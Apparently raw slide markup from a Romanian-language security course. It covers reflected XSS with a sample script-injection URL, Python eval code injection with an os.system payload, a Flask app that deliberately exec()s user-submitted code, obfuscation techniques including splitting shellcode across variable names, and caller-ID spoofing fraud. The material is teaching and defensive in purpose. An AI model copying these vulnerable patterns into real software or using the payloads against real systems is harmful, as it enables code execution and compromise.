              <a:t>Un exploit de scripting între site-uri. Codul de mai sus este un document HTML conceput pentru o demonstrație Cross-Site Scripting (XSS). Observați că după titlu, există o etichetă &lt;script&gt; care include cod JavaScript. Scriptul definește o funcție numită getQueryVariable. Această funcție este concepută pentru a analiza șirul de interogare URL pentru a găsi valoarea asociată cu un anumit nume de variabilă. Mai întâi extrage șirul de interogare din adresa URL curentă, excluzând semnul de întrebare inițial, folosind window.location.search.substring(1). Șirul de interogare este apoi împărțit în perechi cheie-valoare la fiecare ampersand (“&amp;”). Fiecare pereche este împărțită în continuare la semnul egal (“=”) pentru a separa cheia și valoarea. Funcția trece prin aceste perechi și returnează valoarea dacă găsește o potrivire pentru numele variabilei date. Dacă nu se găsește nicio variabilă care se potrivește, returnează false. După definirea funcției, scriptul preia intrarea utilizatorului de la adresa URL apelând getQueryVariable(„input”). Rezultatul este stocat în variabila userInput. Scriptul verifică apoi dacă userInput are o valoare. Dacă o face, scriptul folosește document.write pentru a scrie un șir „User Input:” urmat de intrarea decodificată de utilizator (decodeURIComponent(userInput)) în documentul HTML. Această acțiune demonstrează o vulnerabilitate XSS, deoarece document.write cu userInput injectează direct conținut în pagina HTML, care poate fi exploatat dacă userInput conține scripturi rău intenționate. Dacă userInput nu are o valoare, scriptul scrie „Nu a fost furnizată nicio intrare de utilizator”. la document. Această parte a scriptului este o demonstrație a modului în care intrarea utilizatorului poate fi reflectată înapoi pe pagină, un mecanism tipic utilizat în atacurile XSS reflectate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159963" y="57408"/>
            <a:ext cx="2794868" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A cross-site scripting exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155372" y="6369043"/>
            <a:ext cx="9746342" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://localhost:8000/ example.html?input=%3Cscript%3Ealert('XSS%20Executed')%3C/script%3E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5194408" y="422672"/>
            <a:ext cx="6322678" cy="383727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573484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129194"/>
            <a:ext cx="4604657" cy="4265783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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calculate_expression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result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eval</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user_input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"Result: {result}"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Exception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"Error: {e}"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calculate_expression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 + 3 * 5"</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user input that includes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Python code for exploitation.</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"__import__('os').system('echo This is a code injection!')"</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calculate_expression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malicious_input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5860143" y="486620"/>
            <a:ext cx="1588897" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885543" y="1013273"/>
            <a:ext cx="5660572" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Un exploit de injectare de cod Python. Fragmentul de cod furnizat definește o funcție numită calculate_expression care acceptă un singur argument user_input. Această funcție încearcă să evalueze user_input ca o expresie Python folosind funcția eval. Dacă evaluarea are succes, se tipărește rezultatul expresiei. Totuși, dacă apare o eroare în timpul evaluării (de exemplu, dacă intrarea nu este o expresie Python validă), funcția prinde excepția și tipărește un mesaj de eroare. Funcția calculate_expression este apoi utilizată în două scenarii diferite. În primul scenariu, este numit cu o expresie aritmetică simplă „2 + 3 * 5”. Acesta este un caz de utilizare normal, în care funcția evaluează expresia și tipărește rezultatul, care în acest caz ar fi 17. În al doilea scenariu, funcția este apelată cu un șir malicious_input, care conține o comandă Python concepută pentru a demonstra un cod. vulnerabilitatea la injectare. Șirul __import__('os').system('echo Aceasta este o injecție de cod!') este o încercare de a exploata capacitatea funcției eval de a executa cod Python arbitrar. Acest cod încearcă să importe modulul os și apoi folosește metoda de sistem pentru a executa o comandă de sistem (echo Aceasta este o injecție de cod!). Într-un scenariu real, o astfel de injecție ar putea fi utilizată pentru a executa comenzi dăunătoare sau pentru a compromite sistemul, ilustrând riscurile potențiale de securitate asociate cu utilizarea necorespunzătoare a funcției de eval.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275415489"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5842680" y="5753894"/>
          <a:ext cx="5876925" cy="449580"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5876925">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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8735">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This is a code injection!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Result: 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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860143" y="943430"/>
            <a:ext cx="5871028" cy="468649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731263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524" y="192332"/>
            <a:ext cx="6096000" cy="6403804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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from</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flask</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Flask</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request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render_template_string</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app</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Flask</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__name__</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@app.route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index</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&lt;form action="/run" method="POST"&gt;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&lt;textarea name="code" rows="10" cols="30"&gt;&lt;/textarea&gt;&lt;br&gt;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&lt;input type="submit" value="Run Code"&gt;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&lt;/form&gt;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@app.route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methods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run_code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code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request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'code'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unsafe execution:</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exec</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code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"Code executed successfully."</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Exception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"Error: "</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__name__</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'__main__'</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    app</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run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debug</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True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04292295"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5653993" y="4312007"/>
          <a:ext cx="5876925" cy="2002362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5876925">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="157648">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Output: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844714">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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2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b="1">
                          <a:solidFill>
                            <a:srgbClr val="40404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84B3DF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 91" descr="Capt233223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4737" y="4575404"/>
            <a:ext cx="214312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92" descr="Capturww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936" y="4575404"/>
            <a:ext cx="1952625" cy="1581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08526" y="312449"/>
            <a:ext cx="3135410" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Remote code execution in Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537555" y="762872"/>
            <a:ext cx="6096000" cy="3308598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t>This Python script is a Flask web application designed to run arbitrary Python code provided by the user through a web interface. It begins by importing the necessary modules from Flask: Flask itself, request, and render_template_string. The Flask object is instantiated with the name of the current module (__name__), creating the web application instance named app. The script defines two routes or endpoints. The first route, associated with the URL path “/”, is linked to the index function. This function returns an HTML form when accessed. This form contains a textarea where users can input Python code and a submit button labeled "Run Code". When the form is submitted, it sends a POST request to the /run URL. The second route, /run, is defined to handle POST requests and is linked to the run_code function. When this route is accessed, the run_code function retrieves the submitted Python code from the form data (request.form['code']). It then attempts to execute this code using the exec() function, which is an unsafe method of executing dynamic Python code and presents a significant security risk. If the code execution is successful, the function returns a message stating "Code executed successfully." If an exception occurs during the execution of the code, the function catches this exception and returns an "Error" message along with the exception details. Next, the script checks if it is being run as the main program and not as a module imported by another script. If it is the main program, app.run(debug=True) is called, which starts the Flask web server with debug mode enabled. Debug mode allows for more verbose output in the console and provides an interactive debugger in the browser in case of server errors. However, running a Flask application in debug mode on a production server is not recommended due to potential security risks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537555" y="681781"/>
            <a:ext cx="6096000" cy="344753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295904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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.12.5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscarea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4033279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Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>emergenta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Împărțirea unui shellcode în nume de variabile, într-un script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Alăturarea tuturor variabilelor ne oferă codul shell curat care poate fi scris în binar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Deci, scriptul este inofensiv, dar, cumulativ, numele variabilelor constitue un malware emergent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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64113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Ofruscarea</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>alte tehnici de ofuscare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Minificarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – este procesul de eliminare a tuturor caracterelor inutile din codul sursă fără a schimba funcționalitatea. Aceasta include spațiile albe, liniile noi, comentariile, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Original:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function adunare(a, b) { return a + b; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofuscat (minificat):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function adunare(a,b){return a+b;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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98869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Phising</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ce este un atac de tip spoofing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fraudatorii initiaza apeluri telefonice catre public, cu scopul de a obtine date personale si / sau confidentiale in baza carora sa reuseasca sustragerea resurselor financiare ale victimelor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In demersul lor, fraudatorii utilizeaza diverse tehnologii care ascund numerele de telefon reale de pe care se initiaza apelurile si afiseaza publicului, in locul acestora, numere asociate BRD (ex: cele disponibile pe site-ul Bancii sau cele de pe cardurile emise de Banca).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Astfel, se induce victimelor falsa impresie ca apelurile provin de la o sursa de incredere, lucru care le poate determina sa fie mai putin vigilente si sa divulge date personale si/sau confidentiale, sub diverse pretexte.</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852701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a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180496"/>
            <a:ext cx="11029615" cy="4329161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inserarea de Atribuiri Complicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Folosirea expresiilor sau atribuirilor complicate și neintuitive pentru a realiza operațiuni simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: let x = 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: let x = 10; x = (x++ * x-- + x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Folosirea Codului Mort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Introducerea de cod care nu va fi executat niciodată (cod mort), pentru a induce în eroare analizatorul sau cititorul.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>if (false) { console.log("Acest cod nu va fi executat niciodată."); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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828339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a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2071639"/>
            <a:ext cx="11029615" cy="4438018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Splitarea Stringurilor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Împărțirea stringurilor în fragmente mai mici care sunt apoi concatenate dinamic în cod.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Original: console.log("Mesaj secret");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    Ofuscat: console.log("Mes" + "aj " + "secret");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilizarea Funcțiilor Generatoare de Cod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Crearea de funcții care generează și execută dinamic cod prin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> sau noi instanțe de funcții.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>const exec = new Function('return 1 + 1;'); console.log(exec()); // Execută codul generat dinamic</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187779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a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2028096"/>
            <a:ext cx="11029615" cy="4677504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Folosirea Codului Dinamic Executabil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executarea codului generat dinamic, de exemplu, prin eval(), pentru a evalua stringuri ca și cod.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>eval("console.log('execută acest cod');");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transformări Logice Complexe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Înlocuirea condițiilor sau a buclelor simple cu variante mult mai complexe și greu de urmărit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exemplu:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Original (javascript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>if (user.isValid) { login(user); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofuscat (javascript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>user.isValid &amp;&amp; login(user);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sau chiar folosind logica mai complicată pentru a evalua aceeași condiție.</a:t>
            </a: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59911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5676" y="1507670"/>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a:xfrm>
            <a:off x="388257" y="182106"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ofruscari</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918028" y="2482836"/>
            <a:ext cx="10515600" cy="2826204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Transformările numerice reprezintă o altă categorie interesantă de tehnici de ofuscare, implicând conversia datelor între diferite sisteme de numerație sau formate pentru a ascunde valorile sau logica reală. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Aceste transformări pot face analiza codului mai dificilă, deoarece necesită un pas suplimentar de conversie pentru a înțelege valorile efective utilizate în execuție.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="675442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 - transformari</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
